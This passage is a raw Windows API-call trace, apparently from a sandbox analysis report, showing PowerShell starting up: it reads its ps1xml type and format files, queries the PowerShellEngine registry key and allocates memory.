CoTaskMemFree (pv=0x431b90) [0048.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0048.814] SetErrorMode (uMode=0x1) returned 0x1 [0048.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d590 | out: lpFileInformation=0x26d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0048.814] SetErrorMode (uMode=0x1) returned 0x1 [0048.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0048.816] SetErrorMode (uMode=0x1) returned 0x1 [0048.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d590 | out: lpFileInformation=0x26d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0048.826] SetErrorMode (uMode=0x1) returned 0x1 [0048.828] SetErrorMode (uMode=0x1) returned 0x1 [0048.829] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d590 | out: lpFileInformation=0x26d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0048.829] SetErrorMode (uMode=0x1) returned 0x1 [0048.832] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.832] CoTaskMemFree (pv=0x1b852bb0) [0048.836] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0048.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.836] CoTaskMemFree (pv=0x1b852bb0) [0048.836] GetACP () returned 0x4e4 [0048.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0048.848] SetErrorMode (uMode=0x1) returned 0x1 [0048.849] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0048.850] GetFileType (hFile=0x334) returned 0x1 [0048.850] SetErrorMode (uMode=0x1) returned 0x1 [0048.850] GetFileType (hFile=0x334) returned 0x1 [0048.851] ReadFile (in: hFile=0x334, lpBuffer=0x2dcb3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dcb3d0*, lpNumberOfBytesRead=0x26d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0048.854] ReadFile (in: hFile=0x334, lpBuffer=0x2dcb3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dcb3d0*, lpNumberOfBytesRead=0x26d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0048.854] ReadFile (in: hFile=0x334, lpBuffer=0x2dcb3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dcb3d0*, lpNumberOfBytesRead=0x26d4c8*=0x1000, lpOverlapped=0x0) returned 1 [0048.855] ReadFile (in: hFile=0x334, lpBuffer=0x2dcb3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dcb3d0*, lpNumberOfBytesRead=0x26d4c8*=0xcf3, lpOverlapped=0x0) returned 1 [0048.855] ReadFile (in: hFile=0x334, lpBuffer=0x2dca82b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dca82b*, lpNumberOfBytesRead=0x26d4c8*=0x0, lpOverlapped=0x0) returned 1 [0048.855] ReadFile (in: hFile=0x334, lpBuffer=0x2dcb3d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dcb3d0*, lpNumberOfBytesRead=0x26d4c8*=0x0, lpOverlapped=0x0) returned 1 [0048.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0048.857] SetErrorMode (uMode=0x1) returned 0x1 [0048.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d440 | out: lpFileInformation=0x26d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0048.857] SetErrorMode (uMode=0x1) returned 0x1 [0048.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0048.858] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d528 | out: phkResult=0x26d528*=0x334) returned 0x0 [0048.859] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d4ac, lpData=0x0, lpcbData=0x26d4a8*=0x0 | out: lpType=0x26d4ac*=0x1, lpData=0x0, lpcbData=0x26d4a8*=0x56) returned 0x0 [0048.859] CoTaskMemAlloc (cb=0x5a) returned 0x1b85a8d0 [0048.859] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d47c, lpData=0x1b85a8d0, lpcbData=0x26d478*=0x56 | out: lpType=0x26d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d478*=0x56) returned 0x0 [0048.909] VirtualQuery (in: lpAddress=0x26c210, lpBuffer=0x26d0d0, dwLength=0x30 | out: lpBuffer=0x26d0d0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0048.926] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d4ac, lpData=0x0, lpcbData=0x26d4a8*=0x0 | out: lpType=0x26d4ac*=0x1, lpData=0x0, lpcbData=0x26d4a8*=0x56) returned 0x0 [0048.926] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b060 [0048.926] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d47c, lpData=0x1b87b060, lpcbData=0x26d478*=0x56 | out: lpType=0x26d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d478*=0x56) returned 0x0 [0049.218] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0049.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.227] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d6dc, lpData=0x0, lpcbData=0x26d6d8*=0x0 | out: lpType=0x26d6dc*=0x1, lpData=0x0, lpcbData=0x26d6d8*=0x74) returned 0x0 [0049.227] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d64c, lpData=0x0, lpcbData=0x26d648*=0x0 | out: lpType=0x26d64c*=0x1, lpData=0x0, lpcbData=0x26d648*=0x74) returned 0x0 [0049.227] CoTaskMemAlloc (cb=0x78) returned 0x431b90 [0049.227] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d61c, lpData=0x431b90, lpcbData=0x26d618*=0x74 | out: lpType=0x26d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d618*=0x74) returned 0x0 [0049.232] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0049.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.236] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0049.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.236] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0049.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.237] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0049.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.237] SetErrorMode (uMode=0x1) returned 0x1 [0049.237] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c [0049.237] GetFileType (hFile=0x30c) returned 0x1 [0049.238] SetErrorMode (uMode=0x1) returned 0x1 [0049.238] GetFileType (hFile=0x30c) returned 0x1 [0049.238] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.241] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.242] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.242] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.242] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.242] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.242] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x9e2, lpOverlapped=0x0) returned 1 [0049.243] ReadFile (in: hFile=0x30c, lpBuffer=0x333a632, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333a632*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.243] ReadFile (in: hFile=0x30c, lpBuffer=0x333b0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x333b0e8*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.243] CloseHandle (hObject=0x30c) returned 1 [0049.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.243] SetErrorMode (uMode=0x1) returned 0x1 [0049.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0049.243] SetErrorMode (uMode=0x1) returned 0x1 [0049.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.243] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2c8 | out: phkResult=0x26d2c8*=0x30c) returned 0x0 [0049.243] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.243] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b140 [0049.243] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b140, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.243] CoTaskMemFree (pv=0x1b87b140) [0049.244] RegCloseKey (hKey=0x30c) returned 0x0 [0049.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.256] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x9fd7bf1a, Data2=0xacd3, Data3=0x4124, Data4=([0]=0xaf, [1]=0x22, [2]=0x11, [3]=0x4f, [4]=0x2c, [5]=0xac, [6]=0xbf, [7]=0xd5))) returned 0x0 [0049.266] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xdfa0dfcc, Data2=0xb991, Data3=0x4638, Data4=([0]=0xab, [1]=0x28, [2]=0xc2, [3]=0x25, [4]=0xd0, [5]=0x68, [6]=0x2, [7]=0x99))) returned 0x0 [0049.269] SetErrorMode (uMode=0x1) returned 0x1 [0049.269] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c [0049.269] GetFileType (hFile=0x30c) returned 0x1 [0049.269] SetErrorMode (uMode=0x1) returned 0x1 [0049.269] GetFileType (hFile=0x30c) returned 0x1 [0049.269] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.271] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.272] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.272] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.272] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.273] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0xfb2, lpOverlapped=0x0) returned 1 [0049.274] ReadFile (in: hFile=0x30c, lpBuffer=0x336536a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x336536a*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.274] ReadFile (in: hFile=0x30c, lpBuffer=0x3365c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3365c50*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.274] CloseHandle (hObject=0x30c) returned 1 [0049.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0049.274] SetErrorMode (uMode=0x1) returned 0x1 [0049.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0049.274] SetErrorMode (uMode=0x1) returned 0x1 [0049.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0049.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2c8 | out: phkResult=0x26d2c8*=0x30c) returned 0x0 [0049.275] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.275] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b1b0 [0049.275] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b1b0, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.275] CoTaskMemFree (pv=0x1b87b1b0) [0049.276] RegCloseKey (hKey=0x30c) returned 0x0 [0049.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0049.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0049.278] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb3c8ed8c, Data2=0x63c8, Data3=0x4088, Data4=([0]=0xad, [1]=0x3c, [2]=0xf6, [3]=0xd5, [4]=0x11, [5]=0x2f, [6]=0xd1, [7]=0xe9))) returned 0x0 [0049.283] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x1d72cff6, Data2=0xaef9, Data3=0x45a5, Data4=([0]=0x8b, [1]=0x7, [2]=0xe0, [3]=0xc1, [4]=0xe8, [5]=0x33, [6]=0x4e, [7]=0x14))) returned 0x0 [0049.285] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x7d8dc388, Data2=0x13e3, Data3=0x4908, Data4=([0]=0xa7, [1]=0xc8, [2]=0x47, [3]=0x8d, [4]=0x12, [5]=0x22, [6]=0x61, [7]=0xda))) returned 0x0 [0049.285] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd41454d6, Data2=0xbdba, Data3=0x439c, Data4=([0]=0xaa, [1]=0x4c, [2]=0xe2, [3]=0x2b, [4]=0x16, [5]=0x21, [6]=0xb, [7]=0x44))) returned 0x0 [0049.286] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xbb3386b2, Data2=0x4bf7, Data3=0x4bab, Data4=([0]=0xb7, [1]=0x17, [2]=0xb4, [3]=0x1f, [4]=0xfd, [5]=0x7b, [6]=0xc7, [7]=0x1f))) returned 0x0 [0049.286] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x41d77795, Data2=0xccfb, Data3=0x460f, Data4=([0]=0xbb, [1]=0x4c, [2]=0xe, [3]=0xca, [4]=0x69, [5]=0xc4, [6]=0x13, [7]=0xa))) returned 0x0 [0049.287] SetErrorMode (uMode=0x1) returned 0x1 [0049.289] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.290] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.290] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.291] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.291] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.291] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0xaca, 